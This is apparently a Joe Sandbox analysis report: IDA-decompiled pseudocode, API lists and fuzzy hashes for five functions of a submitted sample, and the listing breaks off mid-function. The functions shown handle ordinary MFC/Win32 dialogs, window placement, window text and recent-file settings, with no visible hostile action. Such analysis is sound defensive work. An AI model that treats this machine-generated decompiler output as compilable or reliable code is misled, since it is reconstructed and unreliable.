                  control_flow_graph 641 417a77-417a8d call 431ace 644 417a9a-417abe call 41f363 call 411f96 * 2 641->644 645 417a8f-417a97 call 41f363 641->645 654 417ac0-417ad0 644->654 655 417aeb 644->655 645->644 657 417ad2-417ad4 654->657 662 417ad9-417ae9 654->662 656 417aee-417af0 655->656 656->657 658 417af2-417b1d call 4014c0 call 42a0d6 656->658 660 417c25-417c2a call 431b73 657->660 669 417b1f-417b51 call 42a09a call 429ff6 call 429d03 call 429cf5 658->669 670 417b5e-417b71 call 410f0d 658->670 662->656 669->670 689 417b53-417b5c GlobalLock 669->689 675 417b73-417b75 670->675 676 417b77 670->676 678 417b7a-417b93 CreateDialogIndirectParamA call 4010b0 675->678 676->678 683 417b98-417bc7 678->683 687 417be1-417be8 call 40eef5 683->687 688 417bc9-417bcb 683->688 694 417bf4-417bf6 687->694 695 417bea-417bec 687->695 688->687 691 417bcd-417bd9 688->691 689->670 691->687 696 417c07-417c0a 694->696 697 417bf8-417bfc 694->697 695->694 699 417c0c-417c18 GlobalUnlock GlobalFree 696->699 700 417c1e-417c22 696->700 697->696 698 417bfe-417c05 DestroyWindow 697->698 698->696 699->700 700->660
                  C-Code - Quality: 91%
                  			E00417A77(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t60;
				signed int _t65;
				signed int _t68;
				struct HWND__* _t69;
				struct HWND__* _t70;
				signed int _t72;
				signed int _t102;
				void* _t113;
				signed int _t116;
				DLGTEMPLATE* _t117;
				struct HWND__* _t118;
				intOrPtr* _t120;
				void* _t121;

				_t115 = __edi;
				_t113 = __edx;
				_t96 = __ecx;
				_push(0x3c);
				E00431ACE(E0044B598, __ebx, __edi, __esi);
				_t120 = __ecx;
				 *((intOrPtr*)(_t121 - 0x20)) = __ecx;
				_t125 =  *(_t121 + 0x10);
				if( *(_t121 + 0x10) == 0) {
					 *(_t121 + 0x10) =  *(E0041F363(0, __edi, __ecx, _t125) + 0xc);
				}
				_t116 =  *(E0041F363(0, _t115, _t120, _t125) + 0x3c);
				 *(_t121 - 0x28) = _t116;
				 *(_t121 - 0x14) = 0;
				 *(_t121 - 4) = 0;
				E00411F96(0, _t96, _t116, _t120, _t125, 0x10);
				E00411F96(0, _t96, _t116, _t120, _t125, 0x3c000);
				if(_t116 == 0) {
					_t117 =  *(_t121 + 8);
					L7:
					__eflags = _t117;
					if(_t117 == 0) {
						L4:
						_t60 = 0;
						L26:
						return E00431B73(_t60);
					}
					E004014C0(_t121 - 0x1c, _t113);
					 *(_t121 - 4) = 1;
					 *((intOrPtr*)(_t121 - 0x18)) = 0;
					_t65 = E0042A0D6(__eflags, _t117, _t121 - 0x1c, _t121 - 0x18);
					__eflags = _t65;
					__eflags = 0 | _t65 == 0x00000000;
					if(__eflags != 0) {
						_push(_t117);
						E0042A09A(0, _t121 - 0x38, _t117);
						 *(_t121 - 4) = 2;
						E00429FF6(_t121 - 0x38,  *((intOrPtr*)(_t121 - 0x18)));
						 *(_t121 - 0x14) = E00429D03(_t121 - 0x38);
						 *(_t121 - 4) = 1;
						E00429CF5(_t121 - 0x38);
						__eflags =  *(_t121 - 0x14);
						if(__eflags != 0) {
							_t117 = GlobalLock( *(_t121 - 0x14));
						}
					}
					 *(_t120 + 0x44) =  *(_t120 + 0x44) | 0xffffffff;
					 *(_t120 + 0x3c) =  *(_t120 + 0x3c) | 0x00000010;
					E00410F0D(__eflags, _t120);
					_t68 =  *(_t121 + 0xc);
					__eflags = _t68;
					if(_t68 != 0) {
						_t69 =  *(_t68 + 0x20);
					} else {
						_t69 = 0;
					}
					_t70 = CreateDialogIndirectParamA( *(_t121 + 0x10), _t117, _t69, E00417499, 0); // executed
					_t118 = _t70;
					E004010B0( *((intOrPtr*)(_t121 - 0x1c)) + 0xfffffff0, _t113);
					 *(_t121 - 4) =  *(_t121 - 4) | 0xffffffff;
					_t102 =  *(_t121 - 0x28);
					__eflags = _t102;
					if(__eflags != 0) {
						__eflags = _t118;
						if(__eflags != 0) {
							 *((intOrPtr*)( *_t102 + 0x18))(_t121 - 0x48);
							 *((intOrPtr*)( *_t120 + 0x134))(0);
						}
					}
					_t72 = E0040EEF5(__eflags);
					__eflags = _t72;
					if(_t72 == 0) {
						 *((intOrPtr*)( *_t120 + 0x11c))();
					}
					__eflags = _t118;
					if(_t118 != 0) {
						__eflags =  *(_t120 + 0x3c) & 0x00000010;
						if(( *(_t120 + 0x3c) & 0x00000010) == 0) {
							DestroyWindow(_t118);
							_t118 = 0;
							__eflags = 0;
						}
					}
					__eflags =  *(_t121 - 0x14);
					if( *(_t121 - 0x14) != 0) {
						GlobalUnlock( *(_t121 - 0x14));
						GlobalFree( *(_t121 - 0x14));
					}
					__eflags = _t118;
					_t54 = _t118 != 0;
					__eflags = _t54;
					_t60 = 0 | _t54;
					goto L26;
				}
				_push(_t121 - 0x48);
				if( *((intOrPtr*)( *_t120 + 0x134))() != 0) {
					_t117 =  *((intOrPtr*)( *_t116 + 0x14))(_t121 - 0x48,  *(_t121 + 8));
					goto L7;
				}
				goto L4;
			}
















                  0x00417a77
                  0x00417a77
                  0x00417a77
                  0x00417a77
                  0x00417a7e
                  0x00417a83
                  0x00417a85
                  0x00417a8a
                  0x00417a8d
                  0x00417a97
                  0x00417a97
                  0x00417a9f
                  0x00417aa4
                  0x00417aa7
                  0x00417aaa
                  0x00417aad
                  0x00417ab7
                  0x00417abe
                  0x00417aeb
                  0x00417aee
                  0x00417aee
                  0x00417af0
                  0x00417ad2
                  0x00417ad2
                  0x00417c25
                  0x00417c2a
                  0x00417c2a
                  0x00417af5
                  0x00417b03
                  0x00417b07
                  0x00417b0a
                  0x00417b14
                  0x00417b1b
                  0x00417b1d
                  0x00417b1f
                  0x00417b23
                  0x00417b2e
                  0x00417b32
                  0x00417b42
                  0x00417b45
                  0x00417b49
                  0x00417b4e
                  0x00417b51
                  0x00417b5c
                  0x00417b5c
                  0x00417b51
                  0x00417b5e
                  0x00417b62
                  0x00417b67
                  0x00417b6c
                  0x00417b6f
                  0x00417b71
                  0x00417b77
                  0x00417b73
                  0x00417b73
                  0x00417b73
                  0x00417b85
                  0x00417b91
                  0x00417b93
                  0x00417b98
                  0x00417bc2
                  0x00417bc5
                  0x00417bc7
                  0x00417bc9
                  0x00417bcb
                  0x00417bd3
                  0x00417bdb
                  0x00417bdb
                  0x00417bcb
                  0x00417be1
                  0x00417be6
                  0x00417be8
                  0x00417bee
                  0x00417bee
                  0x00417bf4
                  0x00417bf6
                  0x00417bf8
                  0x00417bfc
                  0x00417bff
                  0x00417c05
                  0x00417c05
                  0x00417c05
                  0x00417bfc
                  0x00417c07
                  0x00417c0a
                  0x00417c0f
                  0x00417c18
                  0x00417c18
                  0x00417c20
                  0x00417c22
                  0x00417c22
                  0x00417c22
                  0x00000000
                  0x00417c22
                  0x00417ac5
                  0x00417ad0
                  0x00417ae7
                  0x00000000
                  0x00417ae7
                  0x00000000

                  APIs
                  • __EH_prolog3_catch.LIBCMT ref: 00417A7E
                  • GlobalLock.KERNEL32 ref: 00417B56
                  • CreateDialogIndirectParamA.USER32(?,?,?,Function_00017499,00000000), ref: 00417B85
                  • DestroyWindow.USER32(00000000), ref: 00417BFF
                  • GlobalUnlock.KERNEL32(?), ref: 00417C0F
                  • GlobalFree.KERNEL32 ref: 00417C18
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Global$CreateDestroyDialogFreeH_prolog3_catchIndirectLockParamUnlockWindow
                  • String ID:
                  • API String ID: 3003189058-0
                  • Opcode ID: 26ae8e959123f86c784b667f59ab4b8ba21f1b10ffa1528ca1f931d7bb6d0aa9
                  • Instruction ID: 0f3f62645ed42ea5829c959189857bbee3ade0c5a9f02b3c178cd9c28f783011
                  • Opcode Fuzzy Hash: 26ae8e959123f86c784b667f59ab4b8ba21f1b10ffa1528ca1f931d7bb6d0aa9
                  • Instruction Fuzzy Hash: 0C51B331A04209DFCF10EFA5C9859EEBBB1BF08318F14442EF502E7291DB789A81CB59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00414166, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 209windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 62%
                  			E00414166(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, RECT* _a8) {
				signed int _v8;
				char _v268;
				RECT* _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				char _v292;
				intOrPtr _v296;
				signed int _v300;
				struct tagRECT _v316;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t71;
				signed char _t79;
				signed int _t84;
				signed int _t89;
				signed int _t91;
				signed int _t99;
				signed int _t114;
				intOrPtr _t128;
				intOrPtr _t129;
				intOrPtr _t136;
				intOrPtr _t151;
				signed int _t153;
				intOrPtr _t154;
				intOrPtr _t157;
				intOrPtr _t158;
				signed int _t163;

				_t151 = __edx;
				_t130 = __ecx;
				_t161 = _t163;
				_t71 =  *0x463404; // 0x38a11573
				_v8 = _t71 ^ _t163;
				_t157 = _a4;
				_t128 = __ecx;
				_t153 = 0;
				_v276 = _t157;
				_v272 = _a8;
				_t167 = __ecx;
				if(__ecx == 0) {
					L2:
					E00406436(_t128, _t130, _t153, _t157, _t167);
				}
				if(_t157 == _t153) {
					goto L2;
				}
				_t76 = GetWindowRect( *(_t157 + 0x20),  &_v316);
				if( *((intOrPtr*)(_t157 + 0x90)) != _t128 || _v272 != _t153 && EqualRect( &_v316, _v272) == 0) {
					if( *((intOrPtr*)(_t128 + 0x98)) != _t153 && ( *(_t157 + 0x88) & 0x00000040) != 0) {
						 *(_t128 + 0x84) =  *(_t128 + 0x84) | 0x00000040;
					}
					 *(_t128 + 0x84) =  *(_t128 + 0x84) & 0xfffffff9;
					_t79 =  *(_t157 + 0x84) & 0x00000006 |  *(_t128 + 0x84);
					 *(_t128 + 0x84) = _t79;
					_t175 = _t79 & 0x00000040;
					if((_t79 & 0x00000040) == 0) {
						_push(0x104);
						_push( &_v268);
						E00412D87(_t128, _t157, _t151, _t153, _t157, _t175); // executed
						E0041FC5A(_t157, _t151,  *((intOrPtr*)(_t128 + 0x20)),  &_v268); // executed
					}
					_t84 = ( *(_t157 + 0x84) ^  *(_t128 + 0x84)) & 0x0000f000 ^  *(_t157 + 0x84) | 0x00000f00;
					if( *((intOrPtr*)(_t128 + 0x98)) == _t153) {
						_t85 = _t84 & 0xfffffffe;
						__eflags = _t84 & 0xfffffffe;
					} else {
						_t85 = _t84 | 0x00000001;
					}
					E00420D66(_t157, _t85);
					_v296 = _t153;
					if( *((intOrPtr*)(_t157 + 0x90)) != _t128 && IsWindowVisible( *(_t157 + 0x20)) != 0) {
						E00412D05(_t157, _t153, _t153, _t153, _t153, _t153, 0x97);
						_v296 = 1;
					}
					_v300 = _v300 | 0xffffffff;
					if(_v272 == _t153) {
						E004133A2(_t128 + 0x9c, _t157);
						E004133A2(_t128 + 0x9c, _t153);
						_t89 =  *0x466524; // 0x2
						_t91 =  *0x466520; // 0x2
						_t135 = _t157;
						E00412D05(_t157, _t153,  ~_t91,  ~_t89, _t153, _t153, 0x115);
					} else {
						E00413342( &_v292, _v272);
						E00422BFB(_t128,  &_v292);
						asm("cdq");
						asm("cdq");
						_push((_v280 - _v288 - _t151 >> 1) + _v288);
						_push((_v284 - _v292 - _t151 >> 1) + _v292);
						_push(_v276);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t114 = E0041365C(_t128);
						_t135 = _v276;
						_v300 = _t114;
						E00412D05(_v276, 0, _v292, _v288, _v284 - _v292, _v280 - _v288, 0x114);
						_t157 = _v276;
						_t153 = 0;
					}
					if(E0040EE3C(_t128, _t135, GetParent( *(_t157 + 0x20))) != _t128) {
						E004133D6(_t157, _t128);
					}
					_t136 =  *((intOrPtr*)(_t157 + 0x90));
					if(_t136 != _t128) {
						__eflags = _t136 - _t153;
						if(_t136 != _t153) {
							__eflags =  *((intOrPtr*)(_t128 + 0x98)) - _t153;
							if( *((intOrPtr*)(_t128 + 0x98)) == _t153) {
								L29:
								_t99 = 0;
								__eflags = 0;
							} else {
								__eflags =  *((intOrPtr*)(_t136 + 0x98)) - _t153;
								if( *((intOrPtr*)(_t136 + 0x98)) != _t153) {
									goto L29;
								} else {
									_t99 = 1;
								}
							}
							_push(_t99);
							_push(0xffffffff);
							goto L31;
						}
					} else {
						_push(_t153);
						_push(_v300);
						L31:
						_push(_t157);
						E00413A2C(_t136, _t153);
					}
					 *((intOrPtr*)(_t157 + 0x90)) = _t128;
					if(_v296 != _t153) {
						E00412D05(_t157, _t153, _t153, _t153, _t153, _t153, 0x57);
					}
					E004139C3(_t128, _t128, _t157);
					 *(E00408487(_t128) + 0xe4) =  *(_t76 + 0xe4) | 0x0000000c;
				}
				_pop(_t154);
				_pop(_t158);
				_pop(_t129);
				return E00430650(_t76, _t129, _v8 ^ _t161, _t151, _t154, _t158);
			}


































                  0x00414166
                  0x00414166
                  0x00414169
                  0x00414171
                  0x00414178
                  0x00414180
                  0x00414184
                  0x00414186
                  0x00414188
                  0x0041418e
                  0x00414194
                  0x00414196
                  0x00414198
                  0x00414198
                  0x00414198
                  0x0041419f
                  0x00000000
                  0x00000000
                  0x004141ab
                  0x004141b7
                  0x004141e6
                  0x004141f1
                  0x004141f1
                  0x004141f8
                  0x0041420e
                  0x00414210
                  0x00414216
                  0x00414218
                  0x0041421a
                  0x00414225
                  0x00414228
                  0x00414237
                  0x00414237
                  0x00414253
                  0x0041425e
                  0x00414265
                  0x00414265
                  0x00414260
                  0x00414260
                  0x00414260
                  0x0041426b
                  0x00414270
                  0x0041427c
                  0x00414297
                  0x0041429c
                  0x0041429c
                  0x004142a6
                  0x004142b3
                  0x00414375
                  0x00414381
                  0x00414386
                  0x00414395
                  0x0041439e
                  0x004143a0
                  0x004142b9
                  0x004142c5
                  0x004142d3
                  0x004142ea
                  0x00414303
                  0x0041430e
                  0x0041430f
                  0x00414315
                  0x0041431b
                  0x0041431c
                  0x0041431d
                  0x00414320
                  0x00414321
                  0x00414326
                  0x0041432c
                  0x0041435f
                  0x00414364
                  0x0041436a
                  0x0041436a
                  0x004143b6
                  0x004143bb
                  0x004143bb
                  0x004143c0
                  0x004143c8
                  0x004143d3
                  0x004143d5
                  0x004143d7
                  0x004143dd
                  0x004143ec
                  0x004143ec
                  0x004143ec
                  0x004143df
                  0x004143df
                  0x004143e5
                  0x00000000
                  0x004143e7
                  0x004143e9
                  0x004143e9
                  0x004143e5
                  0x004143ee
                  0x004143ef
                  0x00000000
                  0x004143ef
                  0x004143ca
                  0x004143ca
                  0x004143cb
                  0x004143f1
                  0x004143f1
                  0x004143f2
                  0x004143f2
                  0x004143f7
                  0x00414403
                  0x0041440e
                  0x0041440e
                  0x00414416
                  0x00414422
                  0x00414422
                  0x0041442c
                  0x0041442d
                  0x00414430
                  0x00414437

                  APIs
                  • GetWindowRect.USER32 ref: 004141AB
                  • EqualRect.USER32 ref: 004141D2
                  • IsWindowVisible.USER32(?), ref: 00414281
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                    • Part of subcall function 0041365C: GetWindowRect.USER32 ref: 004136C8
                    • Part of subcall function 00412D05: SetWindowPos.USER32(C033D88B,000000FF,?,?,00000000,0040E9F3,?,?,0040E9F3,00000000,?,?,000000FF,000000FF,00000015), ref: 00412D2D
                  • GetParent.USER32(?), ref: 004143A8
                    • Part of subcall function 004133D6: SetParent.USER32(?,?,?,004143C0,?,00000000), ref: 004133E9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$Rect$Parent$EqualException@8H_prolog3ThrowVisible
                  • String ID: @
                  • API String ID: 2897153062-2766056989
                  • Opcode ID: 51da40c84404c78246d96a9ebf4bc883016bb9fe2410d1c0c45aae66030a84c8
                  • Instruction ID: f72a821154006f18434582f8d291f052a883131ce462ce5628eead07db9ff8ab
                  • Opcode Fuzzy Hash: 51da40c84404c78246d96a9ebf4bc883016bb9fe2410d1c0c45aae66030a84c8
                  • Instruction Fuzzy Hash: B771B331A005189FCB25DF25DC82BEAB7B9BF89304F0041AEE959E6191DB745EC18F18
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00414CC5, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 43COMMON
                  Download Yara Rule
                  C-Code - Quality: 72%
                  			E00414CC5(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t17;
				intOrPtr* _t20;
				intOrPtr _t26;
				void* _t33;
				void* _t34;

				_push(4);
				E00431A9B(E0044B279, __ebx, __edi, __esi);
				_t33 = __ecx;
				 *((intOrPtr*)(_t34 - 0x10)) = 0;
				E00414C61(__ecx, 0x20, _t34 - 0x10);
				if( *((intOrPtr*)(_t34 + 8)) != 0) {
					_t37 =  *((intOrPtr*)(_t34 - 0x10));
					if( *((intOrPtr*)(_t34 - 0x10)) == 0) {
						_t26 = E00404461(_t37, 0x20);
						 *((intOrPtr*)(_t34 - 0x10)) = _t26;
						 *(_t34 - 4) = 0;
						_t38 = _t26;
						if(_t26 == 0) {
							_t20 = 0;
							__eflags = 0;
						} else {
							_push(0x1e);
							_push( *((intOrPtr*)(_t34 + 8)));
							_push("File%d");
							_push("Recent File List");
							_push(0);
							_t20 = E00426DDD(__ebx, _t26, __edx, 0, _t33, _t38);
						}
						 *(_t34 - 4) =  *(_t34 - 4) | 0xffffffff;
						 *((intOrPtr*)(_t33 + 0x88)) = _t20;
						 *((intOrPtr*)( *_t20 + 0x10))();
					}
				}
				_t17 = E00426574(_t33, "Settings", "PreviewPages", 0); // executed
				 *((intOrPtr*)(_t33 + 0x94)) = _t17;
				return E00431B73(_t17);
			}








                  0x00414cc5
                  0x00414ccc
                  0x00414cd1
                  0x00414cdb
                  0x00414cde
                  0x00414ce6
                  0x00414ce8
                  0x00414ceb
                  0x00414cf5
                  0x00414cf7
                  0x00414cfa
                  0x00414cfd
                  0x00414cff
                  0x00414d18
                  0x00414d18
                  0x00414d01
                  0x00414d01
                  0x00414d03
                  0x00414d06
                  0x00414d0b
                  0x00414d10
                  0x00414d11
                  0x00414d11
                  0x00414d1a
                  0x00414d1e
                  0x00414d28
                  0x00414d28
                  0x00414ceb
                  0x00414d38
                  0x00414d3d
                  0x00414d48

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00414CCC
                    • Part of subcall function 00404461: _malloc.LIBCMT ref: 0040447F
                    • Part of subcall function 00426DDD: __EH_prolog3.LIBCMT ref: 00426DE4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3$_malloc
                  • String ID: File%d$PreviewPages$Recent File List$Settings
                  • API String ID: 1683881009-526586445
                  • Opcode ID: defe5883bab1cd2dd2f943370091bc3ab319ea14d251a2d82829bc4171220619
                  • Instruction ID: 8481b4ebb2348d884e7cf6e9b90d4b3e2943030dba93614afa04e91a5076872d
                  • Opcode Fuzzy Hash: defe5883bab1cd2dd2f943370091bc3ab319ea14d251a2d82829bc4171220619
                  • Instruction Fuzzy Hash: 0901D430E40314ABCF16EFB19846BAF76A0ABC4B01F20451FF5159B2D2DBB84981974D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041FC5A, Relevance: 7.6, APIs: 5, Instructions: 54stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 76%
                  			E0041FC5A(void* __ecx, intOrPtr __edx, struct HWND__* _a4, CHAR* _a8) {
				signed int _v8;
				char _v263;
				char _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t9;
				int _t16;
				struct HWND__* _t22;
				intOrPtr _t23;
				void* _t24;
				intOrPtr _t27;
				void* _t28;
				int _t29;
				intOrPtr _t30;
				CHAR* _t32;
				intOrPtr _t33;
				signed int _t37;

				_t27 = __edx;
				_t24 = __ecx;
				_t35 = _t37;
				_t9 =  *0x463404; // 0x38a11573
				_v8 = _t9 ^ _t37;
				_t22 = _a4;
				_t32 = _a8;
				_push(_t28);
				_t41 = _t22;
				if(_t22 == 0) {
					L2:
					E00406436(_t22, _t24, _t28, _t32, _t41);
				}
				if(_t32 == 0) {
					goto L2;
				}
				_t29 = lstrlenA(_t32);
				_v264 = 0;
				E00431160(_t29,  &_v263, 0, 0xff);
				if(_t29 > 0x100 || GetWindowTextA(_t22,  &_v264, 0x100) != _t29) {
					L7:
					_t16 = SetWindowTextA(_t22, _t32);
				} else {
					_t16 = lstrcmpA( &_v264, _t32); // executed
					if(_t16 != 0) {
						goto L7;
					}
				}
				_pop(_t30);
				_pop(_t33);
				_pop(_t23);
				return E00430650(_t16, _t23, _v8 ^ _t35, _t27, _t30, _t33);
			}






















                  0x0041fc5a
                  0x0041fc5a
                  0x0041fc5d
                  0x0041fc65
                  0x0041fc6c
                  0x0041fc70
                  0x0041fc74
                  0x0041fc77
                  0x0041fc78
                  0x0041fc7a
                  0x0041fc7c
                  0x0041fc7c
                  0x0041fc7c
                  0x0041fc83
                  0x00000000
                  0x00000000
                  0x0041fc91
                  0x0041fc9c
                  0x0041fca3
                  0x0041fcb2
                  0x0041fcd9
                  0x0041fcdb
                  0x0041fcc7
                  0x0041fccf
                  0x0041fcd7
                  0x00000000
                  0x00000000
                  0x0041fcd7
                  0x0041fce4
                  0x0041fce5
                  0x0041fce8
                  0x0041fcef

                  APIs
                  • lstrlenA.KERNEL32(0040539B,?,00000204), ref: 0041FC86
                  • _memset.LIBCMT ref: 0041FCA3
                  • GetWindowTextA.USER32 ref: 0041FCBD
                  • lstrcmpA.KERNEL32(00000000,0040539B,?,00000204), ref: 0041FCCF
                  • SetWindowTextA.USER32(?,0040539B), ref: 0041FCDB
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
                  • String ID:
                  • API String ID: 4273134663-0
                  • Opcode ID: f9e786dce0f22551689d7a2192799aad719d627e5046027f7c7b4cb0d049690b
                  • Instruction ID: 524bb6e1b8b0e51b663d6798a7e8f58f098cd5426cf83612b6fa717cd64371da
                  • Opcode Fuzzy Hash: f9e786dce0f22551689d7a2192799aad719d627e5046027f7c7b4cb0d049690b
                  • Instruction Fuzzy Hash: EF01087660021867DB10AF659D84BDF776CFB59700F000076F906D3241EA74C9859BE8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00448692, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 157COMMON
                  Download Yara Rule
                  C-Code - Quality: 91%
                  			E00448692(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t50;
				void* _t54;
				intOrPtr _t57;
				intOrPtr* _t59;
				intOrPtr* _t63;
				void* _t76;
				void* _t77;
				intOrPtr* _t80;
				char* _t81;
				char _t84;
				intOrPtr* _t87;
				intOrPtr* _t118;
				intOrPtr* _t123;
				void* _t124;
				void* _t125;

				_push(0x54);
				E00431B04(E0044CC2A, __ebx, __edi, __esi);
				_t84 =  *((intOrPtr*)(_t124 + 8));
				_t123 = __ecx;
				if(_t84 != 0xffffffff) {
					_t87 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x24))));
					_t118 = 0;
					__eflags = _t87;
					if(_t87 == 0) {
						L7:
						_t50 =  *((intOrPtr*)(_t123 + 0x4c));
						__eflags = _t50 - _t118;
						if(_t50 != _t118) {
							__eflags =  *((intOrPtr*)(_t123 + 0x3c)) - _t118;
							if(__eflags != 0) {
								 *((char*)(_t124 - 0x30)) = _t84;
								E00448494(_t84, _t124 - 0x2c, _t109, 8, _t118);
								 *((intOrPtr*)(_t124 - 4)) = _t118;
								_t54 = E0044794F(E0044818F(_t124 - 0x2c, _t124 - 0x48));
								_t57 = E0044794F(E0044818F(_t124 - 0x2c, _t124 - 0x50));
								_t118 =  *((intOrPtr*)(_t124 - 0x18)) + _t54;
								_push(_t124 - 0x38);
								_t84 = _t123 + 0x44;
								while(1) {
									_t113 = _t124 - 0x30;
									 *((intOrPtr*)(_t124 - 0x34)) = _t57;
									_t59 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x3c)))) + 0x14))(_t84, _t124 - 0x30, _t124 - 0x2f, _t124 - 0x3c, _t57, _t118);
									__eflags = _t59;
									if(_t59 < 0) {
										break;
									}
									__eflags = _t59 - 1;
									if(_t59 > 1) {
										__eflags = _t59 - 3;
										if(__eflags != 0) {
											goto L25;
										} else {
											_t63 = E00447F97(__eflags,  *((intOrPtr*)(_t124 - 0x30)),  *((intOrPtr*)(_t123 + 0x4c)));
											__eflags = _t63;
											if(_t63 != 0) {
												goto L27;
											} else {
												goto L25;
											}
										}
									} else {
										_t118 =  *((intOrPtr*)(_t124 - 0x38)) - E0044794F(E0044818F(_t124 - 0x2c, _t124 - 0x58));
										__eflags = _t118;
										if(_t118 == 0) {
											L16:
											_t67 = _t124 - 0x30;
											 *((char*)(_t123 + 0x41)) = 1;
											__eflags =  *((intOrPtr*)(_t124 - 0x3c)) - _t124 - 0x30;
											if( *((intOrPtr*)(_t124 - 0x3c)) != _t124 - 0x30) {
												L27:
												_t123 =  *((intOrPtr*)(_t124 + 8));
											} else {
												__eflags = _t118;
												if(_t118 > 0) {
													L20:
													 *((intOrPtr*)(_t124 - 0x40)) = E0044794F(E0044818F(_t124 - 0x2c, _t124 - 0x48));
													_t57 = E0044794F(E0044818F(_t124 - 0x2c, _t124 - 0x50));
													_push(_t124 - 0x38);
													_t118 =  *((intOrPtr*)(_t124 - 0x18)) +  *((intOrPtr*)(_t124 - 0x40));
													__eflags = _t118;
													continue;
												} else {
													__eflags =  *((intOrPtr*)(_t124 - 0x18)) - 0x20;
													if( *((intOrPtr*)(_t124 - 0x18)) >= 0x20) {
														goto L25;
													} else {
														E00448268(_t67, _t124 - 0x2c, _t113, _t123, 8, 0);
														goto L20;
													}
												}
											}
										} else {
											_t76 = E0044794F(E0044818F(_t124 - 0x2c, _t124 - 0x60));
											_push( *((intOrPtr*)(_t123 + 0x4c)));
											_push(_t118);
											_push(1);
											_push(_t76);
											_t77 = E00449E18(_t84, _t113, _t118, _t123, __eflags);
											_t125 = _t125 + 0x10;
											__eflags = _t118 - _t77;
											if(_t118 != _t77) {
												L25:
												__eflags = _t123;
											} else {
												goto L16;
											}
										}
									}
									E00402090(_t124 - 0x2c, _t124, 1, 0);
									goto L2;
								}
								goto L25;
							} else {
								_t50 = E00447F97(__eflags, _t84, _t50); // executed
								__eflags = _t50;
								if(_t50 == 0) {
									goto L8;
								} else {
									goto L6;
								}
							}
						} else {
							L8:
						}
					} else {
						_t80 =  *((intOrPtr*)(__ecx + 0x34));
						_t109 =  *_t80 + _t87;
						__eflags = _t87 -  *_t80 + _t87;
						if(_t87 >=  *_t80 + _t87) {
							goto L7;
						} else {
							 *_t80 =  *_t80 - 1;
							__eflags =  *_t80;
							_t123 =  *((intOrPtr*)(__ecx + 0x24));
							_t81 =  *_t123;
							 *_t123 = _t81 + 1;
							 *_t81 = _t84;
							L6:
						}
					}
				} else {
				}
				L2:
				return E00431B87(_t84, _t118, _t123);
			}


















                  0x00448692
                  0x00448699
                  0x0044869e
                  0x004486a1
                  0x004486a6
                  0x004486b5
